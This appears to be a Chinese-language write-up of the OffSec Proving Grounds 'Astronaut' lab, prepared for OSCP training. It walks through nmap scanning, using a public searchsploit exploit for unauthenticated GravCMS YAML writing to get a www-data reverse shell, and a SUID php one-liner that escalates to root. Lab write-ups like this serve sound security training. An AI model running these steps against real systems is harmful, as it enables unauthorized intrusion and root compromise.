OSCP Astronaut Write-wp

一、靶场详情

靶场名称：

Astronaut

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

GravCMS 任意 YAML 写入 –> www-data 用户权限

权限提升：

www-data 用户权限 –> php suid 权限 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.150.12 --min-rate=2000

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p22,80 -sCV 192.168.150.12

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-03-17 17:46  grav-admin/
|_
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境，开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 GravCMS 任意 YAML 写入/ 更新（未经身份验证）

访问靶机 HTTP 服务，发现系统为 GravCMS 系统，无法通过枚举获取系统具体版本信息。

这里尝试了各种信息枚举，想通过枚举获取 GravCMS 具体版本信息，卡了一段时间之后更改思路，直接通过应用名检索漏洞。有时候突破的方式并没有那么复杂，尝试了所有可能性，依然没有任何发现，就回头重新整理思路。

使用 searchsploit 检索 Grave 应用可利用的 EXP，发现两个可利用脚本。

searchsploit Grav

经过测试通过第二个漏洞利用代码可获取到系统反弹 shell，注意： 需要修改脚本 Payload 和 URL。

searchsploit -m php/webapps/49973.py

在 kali 使用 nc 监听 4444 端口，然后执行漏洞利用代码，成功获取系统 www-data 用户权限 shell，注意： 如若执行一次未成功，需检查脚本反弹 shell Payload 和 URL，再次执行。

升级为交互式 shell。

3.3 提权获取系统管理员权限

3.3.1 PHP sudo 提权获取系统 root 用户权限

使用 find 命令发现系统 php 程序具有 suid 权限，可利用该权限提权至 root。

find / -perm -u=s -type f 2>/dev/null

提权参考链接：

https://gtfobins.github.io/gtfobins/php/#suid

/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
bash -p

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨